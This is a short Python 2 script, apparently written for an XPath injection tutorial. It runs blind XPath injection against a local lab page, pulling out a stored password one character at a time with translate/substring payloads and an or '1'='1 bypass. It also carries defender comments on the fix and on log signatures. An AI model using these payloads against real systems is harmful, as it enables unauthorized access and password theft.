i-Hmx

Xpath exploit (translate)

Jun 27th, 2015
# For the sec4ever XPath injection tutorial
# http://www.sec4ever.com/home/showthread.php?t=16741
# Author : i-Hmx
#
# Lab demo of blind XPath injection against a local test page
# (http://localhost/3.php). Python 2 only: urllib2 and the print statement.
#
# The 'user' and 'pass' query parameters carry quote characters and XPath
# functions, so the page presumably concatenates them into its XPath login
# query -- confirm against 3.php. The word "logged" in the response is used
# as a true/false oracle, one character guess per request.
#
# Defender's view: the fix belongs in the page. Keep request values out of
# the XPath expression text (bind them as variables, or reject quotes), and
# store a salted hash in the pwd node, since whatever it holds is read back
# character by character. In access logs this run shows up as a burst of
# near-identical login requests whose 'user' value contains translate( or
# substring(.
import urllib2
import urllib
import time

start = time.time()
# Candidate characters, tried in this order for every position.
chars = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()/*-+."
length = 10  # number of character positions probed (hard-coded)
pwd = ''     # characters recovered so far
q = 0        # HTTP requests sent

for position in range(1, length + 1):
    index = str(position)
    for candidate in chars:
        # Request 1: case-insensitive test. translate() folds A-Z to a-z
        # (XPath 1.0 has no lower-case function), so one request covers
        # both cases of a letter.
        folded_test = ("admin' and translate(substring(pwd," + index + ",1), "
                       "'ABCDEFGHIJKLMNOPQRSTUVWXYZ', "
                       "'abcdefghijklmnopqrstuvwxyz')='" + candidate +
                       "' and '1'='1")
        # 'pass' carries an or '1'='1 clause, presumably so the password
        # comparison in the page's query cannot fail.
        query = urllib.urlencode({ 'user' : folded_test,
                                   'pass' : "sec4' or '1'='1"})
        data = urllib2.urlopen("http://localhost/3.php?" + query).read()
        q += 1
        if "logged" not in data:
            continue

        # Request 2: exact comparison against the upper-case form decides
        # which case the stored character has.
        shouted = candidate.upper()
        exact_test = ("admin' and substring(pwd," + index + ",1)='" +
                      shouted + "' and '1'='1")
        query = urllib.urlencode({ 'user' : exact_test,
                                   'pass' : "sec4' or '1'='1"})
        data = urllib2.urlopen("http://localhost/3.php?" + query).read()
        q += 1

        found = shouted if "logged" in data else candidate
        print "[" + index + "] -> " + found
        pwd += found
        break
    # If no candidate matched, nothing is appended for this position and the
    # loop moves on, so pwd can end up shorter than `length`.

end = time.time()
print "\nPassword : " + pwd
print "Number of queries : " + str(q)
print "Time taken : " + str(end - start)